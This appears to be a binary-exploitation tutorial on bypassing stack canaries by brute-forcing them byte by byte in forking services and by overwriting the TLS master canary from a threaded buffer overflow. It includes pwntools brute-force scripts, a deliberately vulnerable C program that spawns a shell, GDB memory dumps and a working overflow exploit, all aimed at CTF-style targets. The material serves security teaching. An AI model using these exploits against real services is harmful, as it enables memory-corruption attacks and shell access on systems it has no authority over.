BF Forked & Threaded Stack Canaries
[AD REMOVED]
If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.
[!NOTE] Note that
checksec
might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\ However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.
Brute force Canary
The best way to bypass a simple canary is if the binary is a program forking child processes every time you establish a new connection with it (network service), because every time you connect to it the same canary will be used.
Then, the best way to bypass the canary is just to brute-force it char by char, and you can figure out if the guessed canary byte was correct checking if the program has crashed or continues its regular flow. In this example the function brute-forces an 8 Bytes canary (x64) and distinguish between a correct guessed byte and a bad byte just checking if a response is sent back by the server (another way in other situation could be using a try/except):
Example 1
This example is implemented for 64bits but could be easily implemented for 32 bits.
from pwn import *
def connect():
r = remote("localhost", 8788)
def get_bf(base):
canary = ""
guess = 0x0
base += canary
while len(canary) < 8:
while guess != 0xff:
r = connect()
r.recvuntil("Username: ")
r.send(base + chr(guess))
if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()
print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base
canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
Example 2
This is implemented for 32 bits, but this could be easily changed to 64bits.\ Also note that for this example the program expected first a byte to indicate the size of the input and the payload.
from pwn import *
# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21
for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")
# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))
# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))
# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break
# Return the canary
return known_canary
# Start the target process
target = process('./feedme')
#gdb.attach(target)
# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")
Threads
Threads of the same process will also share the same canary token, therefore it'll be possible to brute-force a canary if the binary spawns a new thread every time an attack happens.
A buffer overflow in a threaded function protected with canary can be used to modify the master canary of the process. As a result, the mitigation is useless because the check is used with two canaries that are the same (although modified).
Example
The following program is vulnerable to Buffer Overflow, but it is compiled with canary:
#include <pthread.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
// gcc thread_canary.c -no-pie -l pthread -o thread_canary
void win() {
execve("/bin/sh", NULL, NULL);
}
void* vuln() {
char data[0x20];
gets(data);
}
int main() {
pthread_t thread;
pthread_create(&thread, NULL, vuln, NULL);
pthread_join(thread, NULL);
return 0;
}
Notice that vuln
is called inside a thread. In GDB we can take a look at vuln
, specifically, at the point where the program calls gets
to read input data:
gef> break gets
Breakpoint 1 at 0x4010a0
gef> run
...
gef> x/10gx $rdi
0x7ffff7d7ee20: 0x0000000000000000 0x0000000000000000
0x7ffff7d7ee30: 0x0000000000000000 0x0000000000000000
0x7ffff7d7ee40: 0x0000000000000000 0x493fdc653a156800
0x7ffff7d7ee50: 0x0000000000000000 0x00007ffff7e17ac3
0x7ffff7d7ee60: 0x0000000000000000 0x00007ffff7d7f640
The above represents the address of data
, where the program will write user input. The stack canary is found at 0x7ffff7d7ee48
(0x493fdc653a156800
), and the return address is at 0x7ffff7d7ee50
(0x00007ffff7e17ac3
):
gef> telescope $rdi 8 -n
0x7ffff7d7ee20|+0x0000|+000: 0x0000000000000000 <- $rdi
0x7ffff7d7ee28|+0x0008|+001: 0x0000000000000000
0x7ffff7d7ee30|+0x0010|+002: 0x0000000000000000
0x7ffff7d7ee38|+0x0018|+003: 0x0000000000000000
0x7ffff7d7ee40|+0x0020|+004: 0x0000000000000000
0x7ffff7d7ee48|+0x0028|+005: 0x493fdc653a156800 <- canary
0x7ffff7d7ee50|+0x0030|+006: 0x0000000000000000 <- $rbp
0x7ffff7d7ee58|+0x0038|+007: 0x00007ffff7e17ac3 <start_thread+0x2f3> -> 0xe8ff31fffffe6fe9 <- retaddr[2]
Notice that the stack addresses do not belong to the actual stack:
gef> vmmap stack
[ Legend: Code | Heap | Stack | Writable | ReadOnly | None | RWX ]
Start End Size Offset Perm Path
0x00007ffff7580000 0x00007ffff7d83000 0x0000000000803000 0x0000000000000000 rw- <tls-th1><stack-th2> <- $rbx, $rsp, $rbp, $rsi, $rdi, $r12
0x00007ffffffde000 0x00007ffffffff000 0x0000000000021000 0x0000000000000000 rw- [stack] <- $r9, $r15
The thread's stack is placed above the Thread Local Storage (TLS), where the master canary is stored:
gef> tls
$tls = 0x7ffff7d7f640
...
---------------------------------------------------------------------------- TLS ----------------------------------------------------------------------------
0x7ffff7d7f640|+0x0000|+000: 0x00007ffff7d7f640 -> [loop detected] <- $rbx, $r12
0x7ffff7d7f648|+0x0008|+001: 0x00000000004052b0 -> 0x0000000000000001
0x7ffff7d7f650|+0x0010|+002: 0x00007ffff7d7f640 -> [loop detected]
0x7ffff7d7f658|+0x0018|+003: 0x0000000000000001
0x7ffff7d7f660|+0x0020|+004: 0x0000000000000000
0x7ffff7d7f668|+0x0028|+005: 0x493fdc653a156800 <- canary
0x7ffff7d7f670|+0x0030|+006: 0xb79b79966e9916c4 <- PTR_MANGLE cookie
0x7ffff7d7f678|+0x0038|+007: 0x0000000000000000
...
[!NOTE] Some of the above GDB functions are defined on an extension called bata24/gef, which has more features than the usual hugsy/gef.
As a result, a large Buffer Overflow can allow to modify both the stack canary and the master canary in the TLS. This is the offset:
This is a short exploit to call win
:
from pwn import *
context.binary = 'thread_canary'
payload = b'A' * 0x28 # buffer overflow offset
payload += b'BBBBBBBB' # overwritting stack canary
payload += b'A' * 8 # saved $rbp
payload += p64(context.binary.sym.win) # return address
payload += b'A' * (0x848 - len(payload)) # padding
payload += b'BBBBBBBB' # overwritting master canary
io = context.binary.process()
io.sendline(payload)
io.interactive()
Other examples & references
- https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
- 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call
execve
and jump there. - http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads
- 64 bits, no PIE, nx, modify thread and master canary.